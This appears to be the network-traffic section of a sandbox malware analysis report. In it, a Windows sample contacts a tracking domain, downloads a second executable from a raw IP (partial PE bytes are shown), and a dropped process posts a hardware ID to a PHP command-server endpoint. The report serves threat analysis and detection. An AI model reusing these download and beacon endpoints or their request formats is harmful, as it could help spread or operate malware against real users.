Dec 10, 2024 15:12:18.600111961 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.600184917 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.600234985 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.600330114 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.706363916 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.706423044 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.706489086 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.706535101 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.707124949 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.707175970 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.707231045 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.707282066 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.708652020 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.708698034 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.709269047 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.709326029 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.709387064 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.709451914 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.710757971 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.710807085 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.710859060 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.710900068 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.712492943 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.712631941 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.712665081 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.712688923 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.713973045 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.714035988 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.714051962 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.714088917 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.715492010 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.715536118 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.715590000 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.715632915 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.716969013 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.717036009 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.717077971 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.718542099 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.718555927 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.718594074 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.719944000 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.719995022 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.720065117 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.720110893 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.721398115 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.721416950 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.721445084 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.721463919 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.722955942 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.723006964 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.723042965 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.723093987 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.724241018 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.724256039 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.724292994 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.724303007 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.725653887 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.725702047 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.725725889 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.725764036 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.727067947 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.727119923 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.727158070 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.727202892 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.728491068 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.728539944 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.728564024 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.728605032 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.729934931 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.729999065 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.730003119 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.730043888 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.731664896 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.731698990 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.731746912 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.732692957 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.732742071 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.732799053 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.734153986 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.734169006 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.734215021 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.735496998 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.735546112 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.735563993 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.735604048 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.737158060 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.737169981 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.737221003 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.738373041 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.738423109 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.738450050 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.738517046 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.739763021 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.739806890 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.739876986 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.739926100 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.741224051 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.741292953 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.741323948 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.741380930 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.742542028 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.742631912 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.742639065 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.742705107 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.745166063 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.745215893 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.745273113 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.745316982 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.746268034 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.746360064 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.746378899 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.746404886 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.747613907 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.747770071 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.747801065 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.747817039 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.748892069 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.748943090 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.748991013 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.749036074 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.750160933 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.750205040 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.750221014 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.750262976 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.751535892 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.751590014 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.751687050 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.751835108 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.752759933 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.752804995 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.752815008 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.752840996 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.753830910 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.753854990 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.753901005 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.753926992 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.755237103 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.755280972 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.755765915 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.755815029 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.756669998 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.756741047 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.756815910 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.757035971 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.758785009 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.758833885 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.758876085 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.758918047 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.759834051 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.759872913 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.759946108 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.760140896 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.761765957 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.761809111 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.761812925 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.761848927 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.763104916 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.763151884 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.763345003 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.763381958 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.764285088 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.764326096 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.764420986 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.764475107 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.765095949 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.765141010 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.765197039 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.765242100 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:18.766499996 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:18.766547918 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:22.620888948 CET	49707	80	192.168.2.8	92.255.57.89
Dec 10, 2024 15:12:22.740582943 CET	80	49707	92.255.57.89	192.168.2.8
Dec 10, 2024 15:12:22.740667105 CET	49707	80	192.168.2.8	92.255.57.89
Dec 10, 2024 15:12:22.740869045 CET	49707	80	192.168.2.8	92.255.57.89
Dec 10, 2024 15:12:22.860428095 CET	80	49707	92.255.57.89	192.168.2.8
Dec 10, 2024 15:12:23.179434061 CET	80	49706	176.113.115.19	192.168.2.8
Dec 10, 2024 15:12:23.179486036 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:12:24.067008972 CET	80	49707	92.255.57.89	192.168.2.8
Dec 10, 2024 15:12:24.067112923 CET	49707	80	192.168.2.8	92.255.57.89
Dec 10, 2024 15:12:24.069978952 CET	49707	80	192.168.2.8	92.255.57.89
Dec 10, 2024 15:12:24.189625978 CET	80	49707	92.255.57.89	192.168.2.8
Dec 10, 2024 15:12:24.508579969 CET	80	49707	92.255.57.89	192.168.2.8
Dec 10, 2024 15:12:24.508642912 CET	49707	80	192.168.2.8	92.255.57.89
Dec 10, 2024 15:12:29.513895035 CET	80	49707	92.255.57.89	192.168.2.8
Dec 10, 2024 15:12:29.513969898 CET	49707	80	192.168.2.8	92.255.57.89
Dec 10, 2024 15:13:06.112299919 CET	49707	80	192.168.2.8	92.255.57.89
Dec 10, 2024 15:14:03.451819897 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:14:03.763992071 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:14:04.373372078 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:14:05.576503038 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:14:07.982810974 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:14:12.797238111 CET	49706	80	192.168.2.8	176.113.115.19
Dec 10, 2024 15:14:22.404655933 CET	49706	80	192.168.2.8	176.113.115.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 15:12:13.515263081 CET	64355	53	192.168.2.8	1.1.1.1
Dec 10, 2024 15:12:13.873246908 CET	53	64355	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 10, 2024 15:12:13.515263081 CET	192.168.2.8	1.1.1.1	0x78e4	Standard query (0)	post-to-me.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 10, 2024 15:12:13.873246908 CET	1.1.1.1	192.168.2.8	0x78e4	No error (0)	post-to-me.com		104.21.56.70	A (IP address)	IN (0x0001)	false
Dec 10, 2024 15:12:13.873246908 CET	1.1.1.1	192.168.2.8	0x78e4	No error (0)	post-to-me.com		172.67.179.207	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

post-to-me.com

176.113.115.19

92.255.57.89

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49706	176.113.115.19	80	2060	C:\Users\user\Desktop\7gxaFDUSOD.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 15:12:16.606120110 CET	85	OUT	GET /ScreenUpdateSync.exe HTTP/1.1 User-Agent: ShareScreen Host: 176.113.115.19
Dec 10, 2024 15:12:17.937845945 CET	1236	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 14:12:17 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Tue, 10 Dec 2024 14:00:01 GMT ETag: "4a200-628eae5bb46ca" Accept-Ranges: bytes Content-Length: 303616 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 59 67 15 b8 1d 06 7b eb 1d 06 7b eb 1d 06 7b eb 03 54 ff eb 01 06 7b eb 03 54 ee eb 09 06 7b eb 03 54 f8 eb 45 06 7b eb 3a c0 00 eb 1a 06 7b eb 1d 06 7a eb 74 06 7b eb 03 54 f1 eb 1c 06 7b eb 03 54 ef eb 1c 06 7b eb 03 54 ea eb 1c 06 7b eb 52 69 63 68 1d 06 7b eb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 87 15 2e 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f2 02 00 00 1e 3f 00 00 00 00 00 f7 14 00 00 00 10 00 00 00 10 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 42 00 00 04 00 00 92 85 05 00 02 00 00 81 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Yg{{{T{T{TE{:{zt{T{T{T{Rich{PEL.e?@ BD(<Ad.text `.rdatal "@@.data=@l@.rsrcA@@
Dec 10, 2024 15:12:17.937905073 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 1c 10 43 00 3b 0d 04 40 43 00 75 02 f3 c3 e9 ec 04 00 00 6a 0c 68 90 25 43 00 e8 df 12 00 00 8b 75 08 85 f6 74 75 83 3d Data Ascii: %C;@Cujh%Cutu=uCjYeVYEtVPYYE}u7ujYVj5jCCuCPmYUQeVEPuu/u9Et
Dec 10, 2024 15:12:17.937917948 CET	448	IN	Data Raw: 4d dc 50 51 e8 f9 20 00 00 59 59 c3 8b 65 e8 8b 45 dc 89 45 e0 83 7d e4 00 75 06 50 e8 f3 13 00 00 e8 13 14 00 00 c7 45 fc fe ff ff ff 8b 45 e0 eb 13 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff b8 ff 00 00 00 e8 4f 0e 00 00 c3 e8 7b 29 00 00 e9 78 Data Ascii: MPQ YYeEE}uPEE3@eEO{)xU(xhCthCphClhC5hhC=dhCfhCfhCf`hCf\hCf%XhCf-ThChCE\|hCEhCEhCgChC\|gCpgCt
Dec 10, 2024 15:12:17.938138008 CET	1236	IN	Data Raw: 00 10 00 00 50 ff 15 bc 10 43 00 a3 94 6a 43 00 85 c0 75 02 5d c3 33 c0 40 a3 d0 a0 80 00 5d c3 8b ff 56 57 33 f6 bf 98 6a 43 00 83 3c f5 8c 41 43 00 01 75 1e 8d 04 f5 88 41 43 00 89 38 68 a0 0f 00 00 ff 30 83 c7 18 e8 c8 29 00 00 59 59 85 c0 74 Data Ascii: PCjCu]3@]VW3jC<ACuAC8h0)YYtF$\|3@_^$AC3SCVACW>t~tWW&YBC\|AC_t~uPBC\|^[UE4ACC]jh&C3G}39jC
Dec 10, 2024 15:12:17.938150883 CET	1236	IN	Data Raw: ec 51 8d 48 14 51 50 e8 a4 25 00 00 8b 45 08 83 c4 0c ff 0d b8 a0 80 00 3b 05 e8 6b 43 00 76 04 83 6d 08 14 a1 bc a0 80 00 a3 c4 a0 80 00 8b 45 08 a3 e8 6b 43 00 89 3d cc a0 80 00 5b 5f 5e c9 c3 a1 c8 a0 80 00 56 8b 35 b8 a0 80 00 57 33 ff 3b f0 Data Ascii: QHQP%E;kCvmEkC=[_^V5W3;u4kP5W5jCC;u3x5k5hAj5jCCF;tjh hWCF;uvW5jCCN>~F_^
Dec 10, 2024 15:12:17.938285112 CET	1236	IN	Data Raw: 40 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 14 a1 b8 a0 80 00 8b 4d 08 6b c0 14 03 05 bc a0 80 00 83 c1 17 83 e1 f0 89 4d f0 c1 f9 04 53 49 83 f9 20 56 57 7d 0b 83 ce ff d3 ee 83 4d f8 ff eb 0d 83 c1 e0 83 ca ff 33 f6 d3 ea 89 55 f8 8b 0d c4 a0 80 00 Data Ascii: @_^[UMkMSI VW}M3US;#U#u];r;uS;#U#u];r;u[{u];r;u1{u];r;u]u3S:YKC8t
Dec 10, 2024 15:12:17.938297033 CET	1236	IN	Data Raw: 1c ff ff ff 6a 0c 68 38 26 43 00 e8 08 fe ff ff 8b 4d 08 33 ff 3b cf 76 2e 6a e0 58 33 d2 f7 f1 3b 45 0c 1b c0 40 75 1f e8 34 f1 ff ff c7 00 0c 00 00 00 57 57 57 57 57 e8 27 1b 00 00 83 c4 14 33 c0 e9 d5 00 00 00 0f af 4d 0c 8b f1 89 75 08 3b f7 Data Ascii: jh8&CM3;v.jX3;E@u4WWWWW'3Mu;u3F3]wi=uKuE;w7jY}uYEE_];tuWSf!;uaVj5jCC;uL9=8oCt3VqYrE;P
Dec 10, 2024 15:12:17.938317060 CET	1236	IN	Data Raw: 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 56 15 00 00 83 c4 14 68 04 01 00 00 be 39 6c 43 00 56 6a 00 c6 05 3d 6d 43 00 00 ff 15 e8 10 43 00 85 c0 75 26 68 60 17 43 00 68 fb 02 00 00 56 e8 3c 23 00 00 83 c4 0c 85 c0 74 0f 33 c0 50 50 50 50 50 e8 Data Ascii: tVVVVVVh9lCVj=mCCu&h`ChV<#t3PPPPPV"@Y<v8V";j4oCh\C+QP!t3VVVVV3hXCSW!tVVVVVE4BCSW tVVVVVh h0CWd
Dec 10, 2024 15:12:17.938329935 CET	1236	IN	Data Raw: 85 c0 74 07 50 e8 7b e1 ff ff 59 8b 46 44 85 c0 74 07 50 e8 6d e1 ff ff 59 8b 46 48 85 c0 74 07 50 e8 5f e1 ff ff 59 8b 46 5c 3d 00 18 43 00 74 07 50 e8 4e e1 ff ff 59 6a 0d e8 39 e9 ff ff 59 83 65 fc 00 8b 7e 68 85 ff 74 1a 57 ff 15 18 10 43 00 Data Ascii: tP{YFDtPmYFHtP_YF\=CtPNYj9Ye~htWCuDCtW!YEWjYE~lt#W Y;=DCtDCt?uWYEVYujYujYVWCV0CuV
Dec 10, 2024 15:12:17.938534975 CET	1236	IN	Data Raw: 24 7f c3 8b 4d ec 53 8a 1e 89 7d fc 8d 7e 01 83 b9 ac 00 00 00 01 7e 17 8d 45 ec 50 0f b6 c3 6a 08 50 e8 86 26 00 00 8b 4d ec 83 c4 0c eb 10 8b 91 c8 00 00 00 0f b6 c3 0f b7 04 42 83 e0 08 85 c0 74 05 8a 1f 47 eb c7 80 fb 2d 75 06 83 4d 18 02 eb Data Ascii: $MS}~~EPjP&MBtG-uM+uGEKB$9u*0tE4<xt<XtE!Eu0u<xt<XuGG3uNt0t1a
Dec 10, 2024 15:12:18.057334900 CET	1236	IN	Data Raw: 43 00 e8 d6 d7 ff ff 83 25 fc 6b 43 00 00 83 c8 ff eb e4 8b ff 55 8b ec 51 8b 4d 10 53 33 c0 56 89 07 8b f2 8b 55 0c c7 01 01 00 00 00 39 45 08 74 09 8b 5d 08 83 45 08 04 89 13 89 45 fc 80 3e 22 75 10 33 c0 39 45 fc b3 22 0f 94 c0 46 89 45 fc eb Data Ascii: C%kCUQMS3VU9Et]EE>"u39E"FE<tBUPFS#Yt}tMEFUMt2}u tutBe>< t<uFN>}tEE3C3FA>\t>"u&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49707	92.255.57.89	80	3628	C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 15:12:22.740869045 CET	87	OUT	GET / HTTP/1.1 Host: 92.255.57.89 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 15:12:24.067008972 CET	203	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 14:12:23 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 10, 2024 15:12:24.069978952 CET	413	OUT	POST /45c616e921a794b8.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJEGDBKFIJDAKFIDGHJE Host: 92.255.57.89 Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 47 44 42 4b 46 49 4a 44 41 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 37 33 34 44 36 42 46 46 34 38 32 36 30 34 39 38 32 31 36 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 44 42 4b 46 49 4a 44 41 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 47 44 42 4b 46 49 4a 44 41 4b 46 49 44 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------KJEGDBKFIJDAKFIDGHJEContent-Disposition: form-data; name="hwid"CF734D6BFF482604982160------KJEGDBKFIJDAKFIDGHJEContent-Disposition: form-data; name="build"default------KJEGDBKFIJDAKFIDGHJE--
Dec 10, 2024 15:12:24.508579969 CET	210	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 14:12:24 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49705	104.21.56.70	443	2060	C:\Users\user\Desktop\7gxaFDUSOD.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 14:12:15 UTC	90	OUT	GET /track_prt.php?sub=0&cc=DE HTTP/1.1 User-Agent: ShareScreen Host: post-to-me.com
